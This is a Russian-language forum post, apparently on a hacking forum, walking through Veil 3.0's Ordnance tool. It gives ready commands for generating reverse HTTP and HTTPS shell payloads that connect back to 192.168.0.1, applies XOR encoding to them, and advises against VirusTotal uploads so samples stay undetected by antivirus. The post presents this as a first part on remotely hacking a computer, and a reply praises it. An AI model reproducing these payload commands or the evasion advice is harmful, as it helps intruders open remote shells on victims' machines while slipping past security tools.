![]() |
Установка
Часть первая. Veil Ordnance Часть вторая. Veil Evasion Взлом удаленного компьютера. Veil-Evasion. Metasploit Veil Evasion как вы знаете обновился до третьей версии давненько (9 месяцев назад, если быть точнее). Однако более менее подробного осмотра продукта не нашёл. А если, чего то нет, то разбирайся и создавай сам. Тем более что для начинающих Veil достаточно любопытный инструмент, который задействует в себе сразу несколько компонентов для доставки полезной нагрузки: тут тебе и макросы, и повершелл скрипты, и батники, и крипторы. Главное на VIRUSTOTAL не грузите ничего, ПАЖАЛУСТА! Если и хотите проверить файл на детект, либо поставьте себе бесплатный какой-нибудь AV (самый простой вариант Avast), либо воспользуйтесь сервисом https://nodistribute.com/, или скомбинируйте и то и то) Установку достаточно подробно разобрал товарищ @Vander https://codeby.net/threads/veil-framework.60978/ Окунёмся в функционал: Veil 3.0 состоит из двух инструментов Ordnance и Evasion, которые можно использовать либо вдумчиво через меню программы, либо быстрыми, как правило, заранее заготовленными командами. Стандартное меню выглядит следующим образом Код: Код:
./Veil.pyВызываем помощь при использовании инструмента в терминале Код: Код:
./Veil.py -hVeil Ordnance Ordnance используется для быстрого создания шеллкода, который уже в дальнейшем можно использовать для эксплоитов или полезных нагрузок. -Получаем список доступных нагрузок для инструмента Ordnance Код: Код:
./Veil.py -t Ordnance --list-payloads-Список достпных енкодеров Код: Код:
./Veil.py -t Ordnance --list-encoders-Используем Ordnance для генерации обратной полезной нагрузки https, которая соединяется с 192.168.0.1 на 4443 порту Код: Код:
./Veil.py -t Ordnance --ordnance-payload rev_https --ip 192.168.0.1 --port 4443-Используем Ordnance для генерации обратной полезной нагрузки http, которая соединяется с 192.168.0.1 на 8080 порту, затем применяется xor енкодер (-e xor) и удаляются плохие символы (-b \\x00\\x0a) Код: Код:
./Veil.py -t Ordnance --ordnance-payload rev_http --ip 192.168.0.1 --port 8080 -e xor -b \\x00\\x0aЧтобы шелкод смог выполнить своё предназначение его необходимо скомпилировать либо с использованием второго инструмента Evasion, либо сторонним софтом. Ну и гифку закину по использованию через меню самой программы Про Evasion в след. части . Спасибо за внимание. Установка Часть первая. Veil Ordnance Часть вторая. Veil Evasion Взлом удаленного компьютера. Veil-Evasion. Metasploit |
Цитата:
|
Цитата:
|
Всё никак руки не доходили 3-й Veil затестить. ТС молодец, хороший обзор.
|
| Время: 14:00 |